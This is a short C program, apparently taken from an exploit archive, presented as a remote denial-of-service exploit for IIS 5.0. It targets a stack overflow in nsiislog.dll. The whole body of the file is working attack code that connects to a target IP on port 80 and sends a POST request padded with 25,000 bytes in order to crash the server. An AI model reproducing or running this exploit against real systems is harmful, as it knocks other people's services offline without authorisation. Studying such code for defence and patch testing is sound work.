Remote IIS 5.0 denial of service exploit that makes use of the stack based overflow in nsiislog.dll.
44d770ea27a8490f768df00ddd53357cee60223940c04a835e294debe42339e3
/* Remote IIS 5.0 DoS exploit - coded by Rizzy - butayne@linuxmail.org
Exploits the stack based overflow in nsiislog.dll
Advisory: http://packetstormsecurity.nl/0306-advisories/wmediaremote.txt
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
char buffer[25070]="POST /scripts/nsiislog.dll HTTP/1.1\r\nContent-length:25000\r\n\r\n";
struct sockaddr_in sin;
int a, sock, con;
printf("\n\nRizzy's IIS 5.0 (nsiislog.dll) Remote DoS exploit\n");
if(argc!=2) {
printf("Syntax: %s <IPADDRESS>\n\n", argv[0]);
return 0;
}
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = inet_addr(argv[1]);
sock = socket(AF_INET, SOCK_STREAM, 0);
con = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
if (sock && con < 0) {
printf("Socket error!\n");
return 1;
}
for(a = 0; a < 25000 ;++a) {
strcat(buffer, "A");
}
strcat(buffer, "\r\n\r\n");
printf("Sending buffer to crash IIS server [%s]\n", argv[1]);
send(sock, buffer, sizeof(buffer), 0);
close(sock);
printf("Done!\n");
}